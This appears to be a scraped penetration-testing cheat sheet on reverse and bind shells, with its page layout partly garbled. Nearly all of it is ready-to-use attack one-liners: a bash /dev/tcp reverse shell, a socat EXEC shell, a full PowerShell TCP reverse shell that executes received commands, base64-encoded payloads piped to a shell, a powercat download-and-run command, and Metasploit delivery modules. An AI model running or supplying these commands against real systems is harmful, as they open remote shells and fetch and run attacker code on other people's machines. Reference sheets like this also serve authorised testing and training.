Reverse & Bind Shells
Listener
nc -nlvp <PORT>Main
TTY
Description
Command
Command & Control (C2)
Last updated
nc -nlvp <PORT>Last updated
busybox ncngrok tcp <PORT>/bin/bash -c 'bash -i>&/dev/tcp/<myIP>/<myPORT> 0>&1';echo "<PayloadBASE64>" | base64 -d | shsocat TCP4:<myIP>:<myPORT> EXEC:/bin/bashpowershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<IP>',<PORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"powershell -enc <PayloadBASE64>powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://<IP>:<PORT>/powercat.ps1');powercat -c <IP_REV> -p <PORT_REV> -e powershell"exploit/multi/script/web_deliveryexploit/windows/smb/smb_delivery<CTRL+Z>
stty raw -echo
fg